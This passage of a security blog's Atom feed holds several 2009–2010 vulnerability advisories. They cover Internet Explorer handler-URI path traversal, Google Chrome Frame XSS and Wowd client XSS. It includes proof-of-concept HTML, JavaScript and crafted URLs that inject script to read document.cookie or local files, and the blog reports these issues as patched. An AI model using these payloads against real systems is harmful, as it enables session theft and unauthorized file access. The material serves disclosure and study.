/&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;iframe id="myIframe"&lt;br /&gt;src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"&gt;&lt;br /&gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;br /&gt;############### EOF ###########&lt;br /&gt;&lt;br /&gt;if we look it executes Explorer with a local search :D&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;can we read the content of any file and upload it to a server or&lt;br /&gt;manage the content ??&lt;br /&gt;&lt;br /&gt;i don´t have found a way to do it&lt;br /&gt;all times internet explorer denies the access to the content from&lt;br /&gt;iframe.&lt;br /&gt;&lt;br /&gt;############# PoC four ##############&lt;br /&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&lt;br /&gt;&amp;lt;/head&amp;gt;&lt;br /&gt; &amp;lt;body&amp;gt;&lt;br /&gt;&amp;lt;script type="text/javascript"&gt;&lt;br /&gt;function getContentFromIframe(iFrameName)&lt;br /&gt;{&lt;br /&gt; var myIFrame = document.getElementById(iFrameName);&lt;br /&gt; var content = myIFrame.contentWindow.document.body.innerHTML;&lt;br /&gt; alert('content: ' + content);&lt;br /&gt;&lt;br /&gt; content = 'change iframe content';&lt;br /&gt; myIFrame.contentWindow.document.body.innerHTML = content;&lt;br /&gt;}&lt;br /&gt;&amp;lt;/script&amp;gt;   &amp;lt;iframe id="myIframe"&lt;br /&gt;src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;&lt;br /&gt; &amp;lt;a href="#" onclick="getContentFromIframe('myIframe')"&amp;gt;Get the content&amp;lt;/a&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;br /&gt;##################### EOF #############################&lt;br /&gt;&lt;br /&gt;it give a access deniet error&lt;br /&gt;if we look to use XMLHttpRequest()&lt;br /&gt;&lt;br /&gt;it does not work again and access is denied:&lt;br /&gt;&lt;br /&gt;########### PoC Five ######################&lt;br /&gt;var contents;&lt;br /&gt;var req;&lt;br /&gt;req = new XMLHttpRequest();&lt;br /&gt;req.onreadystatechange = processReqChange;&lt;br /&gt;req.open(’GET’,&lt;br /&gt;‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,&lt;br /&gt;true);&lt;br /&gt;req.send(”);&lt;br /&gt;############ EOF #############&lt;br /&gt;&lt;br /&gt;if we use it as a activex it&lt;br /&gt;shows again a access denied :P&lt;br /&gt;&lt;br /&gt;############### PoC six #############&lt;br /&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;div&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;function getHTTPObject()&lt;br /&gt;{&lt;br /&gt;       if (typeof XMLHttpRequest != 'undefined')&lt;br /&gt;               {&lt;br /&gt;                       return new XMLHttpRequest();&lt;br /&gt;               }&lt;br /&gt;       try {&lt;br /&gt;               return new ActiveXObject("Msxml2.XMLHTTP"); }&lt;br /&gt;               catch (e)&lt;br /&gt;               {&lt;br /&gt;                       try&lt;br /&gt;                       {&lt;br /&gt;                               return new ActiveXObject("Microsoft.XMLHTTP");&lt;br /&gt;                       }&lt;br /&gt;                       catch (e) {}&lt;br /&gt;               }&lt;br /&gt;               return false;&lt;br /&gt;}&lt;br /&gt;x = getHTTPObject();&lt;br /&gt;x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);&lt;br /&gt;x.send(null);&lt;br /&gt;alert(x.responseText);&lt;br /&gt;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;!-- end of input --&gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;br /&gt;################ EOF ######################&lt;br /&gt;&lt;br /&gt;Them we can think that we can read txt files , execute html,xml&lt;br /&gt;search-ms files , and download and execute Binaries files from the&lt;br /&gt;victims hard disk , only with view a crafted web page.&lt;br /&gt;&lt;br /&gt;Microsoft has pached it and has release a secutiry bulletin&lt;br /&gt;that solve this issue see &lt;br /&gt;http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx&lt;br /&gt;and&lt;br /&gt;http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx&lt;br /&gt;for details and for download the security update that solve this &lt;br /&gt;issue and seven vulnerabilities more.&lt;br /&gt;&lt;br /&gt;#################### €nd ################&lt;br /&gt;&lt;br /&gt;Thnx to Google security Team for his support&lt;br /&gt;Thnx to MSRC for his support and acknowledgments&lt;br /&gt;Thnx To icar0 &amp; sha0 from Badchecksum&lt;br /&gt;Thnx To Brink For test with me in some windows :D&lt;br /&gt;Thns to estrella to be my ligth&lt;br /&gt;-- &lt;br /&gt;atentamente:&lt;br /&gt;Lostmon (lostmon@gmail.com)&lt;br /&gt;Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;--&lt;br /&gt;La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7907124762738658800?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/VnwMxafkBfY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7907124762738658800?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/7907124762738658800?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/VnwMxafkBfY/internet-explorer-7-8-url-validation.html" title="Internet explorer 7 &amp; 8 URL Validation Vulnerability" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0UNRXgycCp7ImA9WxBXE04.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-2363133555503855928</id><published>2010-01-21T19:17:00.008+01:00</published><updated>2010-01-24T12:08:14.698+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-24T12:08:14.698+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="Acknowledgments" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>Internet explorer 6 7 8 URL Validation Vulnerability</title><content type="html">###################################&lt;br /&gt;Internet explorer 6 7 and 8 URL Validation Vulnerability&lt;br /&gt;Vendor :http://www.Microsoft.com&lt;br /&gt;Vendor notify:YES vendor confirmed :YES&lt;br /&gt;REF Bulletin:&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank"&gt;MS10-002&lt;/a&gt;&lt;br /&gt;#########################################&lt;br /&gt;&lt;br /&gt;A remote code execution vulnerability exists in the way that Internet Explorer incorrectly validates input. An attacker could exploit the vulnerability by constructing a specially crafted URL. When a user clicks the URL, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.&lt;br /&gt;&lt;br /&gt; To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms10-002.mspx" target="_blank"&gt;MS10-002&lt;/a&gt; and CVE-2010-0027.&lt;br /&gt;&lt;br /&gt;No more details at this time I have a PoC But At this moment it, is private.&lt;br /&gt;&lt;br /&gt;Time Line for this vulnerability:&lt;br /&gt;&lt;br /&gt;discovered 05-11-2009&lt;br /&gt;Reported to vendor 15-11-2009&lt;br /&gt;Vendor response:15-11-2009&lt;br /&gt;vendor accepts in case manager 19-11-2009&lt;br /&gt;vendor patch 21-01-2010&lt;br /&gt;&lt;br /&gt;#################€nd#############&lt;br /&gt;&lt;br /&gt;Thnx to estrella To be mi ligth&lt;br /&gt;Thnx To icar0 &amp; sha0 from Badchecksum&lt;br /&gt;Thnx To Google security Team For support&lt;br /&gt;Thnx To MSRC for Support&lt;br /&gt;&lt;br /&gt;atentamente:&lt;br /&gt;Security Research &amp; Analisys.&lt;br /&gt;Lostmon (lostmon@gmail.com)&lt;br /&gt;Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;--&lt;br /&gt;La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-2363133555503855928?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/NzlbgNPTSgnomWcL-ao8oNZgytA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/tfHZ_n_Sx5A" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/2363133555503855928?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/2363133555503855928?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/tfHZ_n_Sx5A/internet-explorer-6-7-8-url-validation.html" title="Internet explorer 6 7 8 URL Validation Vulnerability" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/01/internet-explorer-6-7-8-url-validation.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUBQ3g4fip7ImA9WxNbFk4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-6164724248344390959</id><published>2009-11-19T13:04:00.005+01:00</published><updated>2009-11-19T13:20:52.636+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-19T13:20:52.636+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="Acknowledgments" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>Google Chrome Frame null domain XSS</title><content type="html">#####################################&lt;br /&gt;Google Chrome Frame null domain XSS&lt;br /&gt;vendor url:http://www.google.com/chromeframe&lt;br /&gt;vendor changelog:http://googlechromereleases.blogspot.com/&lt;br /&gt;2009/11/google-chrome-frame-update-bug-fixes.html&lt;br /&gt;Advisore:http://lostmon.blogspot.com/&lt;br /&gt;2009/11/google-chrome-frame-null-domain-xss.html&lt;br /&gt;Vendor notify:yes Exploit available:YES&lt;br /&gt;######################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;######################&lt;br /&gt;Description by vendor&lt;br /&gt;######################&lt;br /&gt;&lt;br /&gt;Google Chrome Frame is a free plug-in for Internet Explorer. &lt;br /&gt;Some advanced web apps, like Google Wave, use Google Chrome &lt;br /&gt;Frame to provide you with additional features and better performance. &lt;br /&gt;&lt;br /&gt;Google Chrome Frame is an early-stage open source &lt;br /&gt;plug-in that seamlessly brings Google Chrome's open&lt;br /&gt;web technologies and speedy JavaScript engine to &lt;br /&gt;Internet Explorer.&lt;br /&gt;&lt;br /&gt;################&lt;br /&gt;version Afected&lt;br /&gt;################&lt;br /&gt;&lt;br /&gt;4.0.223.9 (Official Build 29618)&lt;br /&gt;WebKit: 532.3&lt;br /&gt;V8: 1.3.16&lt;br /&gt;User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)&lt;br /&gt;AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.223.9 Safari/532.3&lt;br /&gt;&lt;br /&gt;Not afected version:&lt;br /&gt;&lt;br /&gt;4.0.245.1 (Official Build 31970)&lt;br /&gt;WebKit: 532.5&lt;br /&gt;V8: 1.3.18.6&lt;br /&gt;User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) &lt;br /&gt;AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.245.1 Safari/532.5&lt;br /&gt;&lt;br /&gt;you can  find aditional information here:&lt;br /&gt;http://googlechromereleases.blogspot.com/&lt;br /&gt;2009/11/google-chrome-frame-update-bug-fixes.html&lt;br /&gt;&lt;br /&gt;#####################&lt;br /&gt;Cross Site scripting&lt;br /&gt;#####################&lt;br /&gt;&lt;br /&gt;Create a html document and some to test =&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;iframe src="javascript:alert(1)&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt; =&gt; this opens  the iframe and execute the alert&lt;br /&gt;( this is correct)&lt;br /&gt;&lt;br /&gt;&amp;ltiframe src="cf:javascript:alert(1)&amp;gt;&amp;lt;/iframe&amp;gt;  &lt;br /&gt;this does not work , not show the alert ( correct)&lt;br /&gt;&lt;br /&gt;and here is the flaw =&gt;&lt;br /&gt;&amp;ltiframe src="cf:view-source:javascript:alert(1)&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;&lt;br /&gt;This show &amp; executed the alert it works on local &amp; remote &lt;br /&gt;scenario or via address bar too.&lt;br /&gt;This bypassed cross-origin protections !!!&lt;br /&gt;&lt;br /&gt;For google chrome browser test this&lt;br /&gt;at the address bar =&gt;&lt;br /&gt;view-source:javascript:alert(1)&lt;br /&gt;&lt;br /&gt;this execute the alert but recently google has made changes&lt;br /&gt;in about:blank page and this issue is only exploitable&lt;br /&gt;via address bar ,not in a iframe or frame or html document&lt;br /&gt;so for that i think that this issue isn´t exploitable in a&lt;br /&gt;remote scenario.&lt;br /&gt;&lt;br /&gt;###########&lt;br /&gt;crashes&lt;br /&gt;###########&lt;br /&gt;&lt;br /&gt;cf:view-source:about@: crash&lt;br /&gt;cf:about@: =&gt; crashing the tab&lt;br /&gt;&lt;br /&gt;##########&lt;br /&gt;Solution&lt;br /&gt;############&lt;br /&gt;&lt;br /&gt;Google has automatic release a new version&lt;br /&gt;of Chrome Frame 4.0.245.1 (Official Build 31970)&lt;br /&gt;and this version is not afected.&lt;br /&gt;&lt;br /&gt;#################€nd#############&lt;br /&gt;&lt;br /&gt;Thnx to estrella To be mi ligth&lt;br /&gt;Thnx To icar0 &amp; sha0 from Badchecksum&lt;br /&gt;Thnx To Google security Team&lt;br /&gt;&lt;br /&gt;atentamente:&lt;br /&gt;Security Research &amp; Analisys.&lt;br /&gt;Lostmon (lostmon@gmail.com)&lt;br /&gt;Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;--&lt;br /&gt;La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6164724248344390959?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/gj7MXsMXHKo1-L6OwWPtYy1RQWs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/6eCs-ZVWVuE" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6164724248344390959?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6164724248344390959?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/6eCs-ZVWVuE/google-chrome-frame-null-domain-xss.html" title="Google Chrome Frame null domain XSS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2009/11/google-chrome-frame-null-domain-xss.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0IHQ3c4eCp7ImA9WxNUEkk.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-196541779141156652</id><published>2009-10-27T19:39:00.004+01:00</published><updated>2009-11-03T10:45:32.930+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-11-03T10:45:32.930+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Spooff" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Wowd search client multiple variable xss</title><content type="html">##########################################&lt;br /&gt;Wowd search client multiple variable xss&lt;br /&gt;Vendor URL: http://www.wowd.com/&lt;br /&gt;Advisore:http://lostmon.blogspot.com/2009/10/&lt;br /&gt;wowd-search-client-multiple-variable.html&lt;br /&gt;Vendor notify:yes exploit available:yes&lt;br /&gt;##########################################&lt;br /&gt;&lt;br /&gt;################&lt;br /&gt;What is Wowd?&lt;br /&gt;################&lt;br /&gt;&lt;br /&gt;Wowd is a real-time search engine for discovering &lt;br /&gt;what's popular on the web right now.&lt;br /&gt;&lt;br /&gt;In essence, the company has made a peer-to-peer &lt;br /&gt;search engine powered by what other Wowd users &lt;br /&gt;are looking at online rather than studying and &lt;br /&gt;ranking sites based on an arcane link structure. &lt;br /&gt;Taking search and breaking it into millions of &lt;br /&gt;tiny pieces all run by individual users who have&lt;br /&gt;downloaded the Wowd client completely changes &lt;br /&gt;the operation -- and economics -- of a search &lt;br /&gt;engine. The more times that someone in the Wowd&lt;br /&gt;crowd clicks on a link within a recent time &lt;br /&gt;frame, the higher the link's ranking.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;##########################&lt;br /&gt;Vulnerability description&lt;br /&gt;##########################&lt;br /&gt;&lt;br /&gt;Wowd client contains a flaw that allows a remote&lt;br /&gt;cross site scripting attack.This flaw exists because&lt;br /&gt;the application does not validate In the URI dialog&lt;br /&gt;'sortby'  'tags' and 'ctx' variables upon submision to&lt;br /&gt;'index.html' script. This could allow a user to create &lt;br /&gt;a specially crafted URL that would execute arbitrary &lt;br /&gt;code in a user's browser within the trust relationship &lt;br /&gt;between the browser and the server,leading loss of integrity.&lt;br /&gt;&lt;br /&gt;This issue can be dangerous , because if you are running&lt;br /&gt;Wowd client , you have  all of this vulnerabilities because&lt;br /&gt;this issue can be exploited accross all browsers,&lt;br /&gt;include ie8 with the XSS filter ( WoW ! )&lt;br /&gt;&lt;br /&gt;#################&lt;br /&gt;Versions&lt;br /&gt;################·&lt;br /&gt;&lt;br /&gt;Wowd client 1.3.0 vulnerable&lt;br /&gt;Wowd client 1.3.1 Not vulnerable&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#################&lt;br /&gt;SOLUTION&lt;br /&gt;#################&lt;br /&gt;&lt;br /&gt;Upgrade to version 1.3.1 or higher, as it has been &lt;br /&gt;reported to fix this vulnerability. An upgrade is &lt;br /&gt;required as there are no known workarounds.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;###################&lt;br /&gt;Proof of Concept.&lt;br /&gt;###################&lt;br /&gt;&lt;br /&gt;#############&lt;br /&gt;Test&lt;br /&gt;#############&lt;br /&gt;&lt;br /&gt;I test it in ie8, firefox 3.5.3 and safari 4&lt;br /&gt;&lt;br /&gt;in all cases the xss is executed include ie8 with xss filter :D&lt;br /&gt;&lt;br /&gt;a remote user can compose a html document&lt;br /&gt;with a iframe and this source for the iframe:&lt;br /&gt;&lt;br /&gt;http://localhost:8101/wowd/index.html?search&amp;sortby=rank%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&lt;br /&gt;&lt;br /&gt;the browser executes the xss ,if you access directly to &lt;br /&gt;this url the xss is executed too.&lt;br /&gt;&lt;br /&gt;aditionaly wen wowd show his results , we have a functionality&lt;br /&gt;to add "tags" to a url.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;http://localhost:8101/wowd/index.html?search&amp;query=a&amp;&lt;br /&gt;sortby=rank&amp;tags=english|S0B0707656E676C6973680D02&lt;br /&gt;&lt;br /&gt;this shows a indexed search with tag 'english'  we can add a &lt;br /&gt;crafted tag that allow to execute a xss like:[tag]|[token]&lt;br /&gt;&lt;br /&gt;example:&lt;br /&gt;&lt;br /&gt;http://localhost:8101/wowd/index.html?search&amp;query=a&lt;br /&gt;&amp;sortby=rank&amp;tags=english|S0B0707656E676C6973680D02,&lt;br /&gt;%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E|S0B0707656E676C6973680D02&lt;br /&gt;&lt;br /&gt;and it executed the xss in the tags labels.&lt;br /&gt;&lt;br /&gt;ctx variable is also afected too&lt;br /&gt;&lt;br /&gt;http://localhost:8101/wowd/index.html?search&amp;page=2&amp;q=&lt;br /&gt;&amp;sortby=rank&amp;tags=news|S0807046E6577730D02&amp;ctx=1995393737681%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;############## €nd ###################&lt;br /&gt;&lt;br /&gt;Thnx To estrella to be my light&lt;br /&gt;Thnx to all Lostmon Team !&lt;br /&gt;-- &lt;br /&gt;atentamente:&lt;br /&gt;Lostmon (lostmon@gmail.com)&lt;br /&gt;Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;--&lt;br /&gt;La curiosidad es lo que hace mover la mente....&lt;br /&gt;----------------------------------------------&lt;br /&gt;Browser: Internet Explorer 8 (Windows)&lt;br /&gt;Browser: Firefox 3.5 (Windows)&lt;br /&gt;Browser: Safari 4 (Windows)&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-196541779141156652?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/PK33TsgG1w_HJA6Rc10HvEfOd1A/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/Lm9J1JZnDTc" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/196541779141156652?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/196541779141156652?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/Lm9J1JZnDTc/wowd-search-client-multiple-variable.html" title="Wowd search client multiple variable xss" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2009/10/wowd-search-client-multiple-variable.html</feedburner:origLink></entry></feed>

